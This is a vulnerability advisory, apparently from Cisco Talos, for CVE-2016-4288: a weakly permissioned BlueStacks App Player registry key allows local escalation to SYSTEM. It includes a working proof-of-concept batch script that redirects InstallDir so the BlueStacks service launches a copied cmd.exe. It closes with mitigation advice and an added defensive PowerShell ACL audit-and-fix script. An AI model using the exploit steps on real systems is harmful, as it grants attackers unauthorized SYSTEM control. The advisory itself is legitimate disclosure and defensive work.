CVE-2016-4288
A local privilege escalation vulnerability exists in BlueStacks App Player. The BlueStacks App Player installer creates a registry key with weak permissions that allows users to execute arbitrary programs with SYSTEM privileges.
BlueStacks 2.1.3.5650
http://www.bluestacks.com/
During installation BlueStacks App Player creates registry keys with weak permissions. Here we can see the ‘Users’ group has full permissions on the InstallDir key:
accesschk -k -w -d HKEY_LOCAL_MACHINE\SOFTWARE\BlueStacks
HKLM\SOFTWARE\BlueStacks
RW BUILTIN\Users
RW BUILTIN\Administrators
RW NT\SYSTEM
Using process monitor we can observe that BlueStacks service is reading the InstallDir key to obtain installation path and later executes HD-Network.exe and other files from that path. A malicious user can set InstallDir to a directory under their control to execute arbitrary code with SYSTEM privileges.
@echo off
echo [+]Run cmd as SYSTEM
mkdir c:\TALOS
REM Copy other necessary files
copy c:\windows\system32\cmd.exe c:\TALOS\HD-Network.exe
reg add "HKLM\SOFTWARE\BlueStacks" /f /v "InstallDir" /t REG_SZ /d c:\TALOS\
echo [+]Restore default values
Change the permissions on the key so that groups other than Administrators are limited to Read/Execute access.
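As an added example, not part of the Talos advisory, the following PowerShell script audits the ACL of the key described above (assumed path HKLM:\SOFTWARE\BlueStacks) for write rights held by low-privilege principals, and with -Fix applies the mitigation of reducing them to read-only:

```powershell
# Added example (not from the Talos advisory): audit a registry key's ACL for
# write access granted to low-privilege principals, and optionally remediate.
param(
    [string]$KeyPath = 'HKLM:\SOFTWARE\BlueStacks',   # key from the advisory
    [switch]$Fix
)

# Rights that let a standard user change values such as InstallDir
$WriteMask = [System.Security.AccessControl.RegistryRights]::SetValue -bor
             [System.Security.AccessControl.RegistryRights]::CreateSubKey -bor
             [System.Security.AccessControl.RegistryRights]::WriteKey -bor
             [System.Security.AccessControl.RegistryRights]::FullControl

# Principals that should never hold write rights on a key read by a SYSTEM service
$LowPriv = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
             'Everyone', 'NT AUTHORITY\INTERACTIVE')

if (-not (Test-Path $KeyPath)) { Write-Error "Key not found: $KeyPath"; exit 1 }

$acl  = Get-Acl -Path $KeyPath
$weak = $acl.Access | Where-Object {
    $_.AccessControlType -eq 'Allow' -and
    $LowPriv -contains $_.IdentityReference.Value -and
    (($_.RegistryRights -band $WriteMask) -ne 0)
}

if (-not $weak) { Write-Host "[OK] No low-privilege write access on $KeyPath"; exit 0 }

foreach ($ace in $weak) {
    Write-Warning ("[WEAK] {0} has {1} on {2}" -f $ace.IdentityReference, $ace.RegistryRights, $KeyPath)
}

if ($Fix) {
    # Remediation matching the advisory's advice: strip write rights from those
    # principals and grant ReadKey only. Must be run from an elevated prompt.
    foreach ($ace in $weak) {
        $acl.RemoveAccessRule($ace) | Out-Null
        $ro = New-Object System.Security.AccessControl.RegistryAccessRule(
            $ace.IdentityReference,
            [System.Security.AccessControl.RegistryRights]::ReadKey,
            $ace.InheritanceFlags, $ace.PropagationFlags, 'Allow')
        $acl.AddAccessRule($ro)
    }
    Set-Acl -Path $KeyPath -AclObject $acl
    Write-Host "[FIXED] Low-privilege principals reduced to ReadKey on $KeyPath"
}
```

Run it without -Fix first to see which ACEs would be changed; the same check can be pointed at any key a SYSTEM service reads a path from by passing -KeyPath.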
Discovered by Marcin 'Icewall' Noga of Cisco Talos.
2016-03-01 - Discovery
2016-04-13 - Reported
2016-08-04 - Patched
2016-08-04 - Released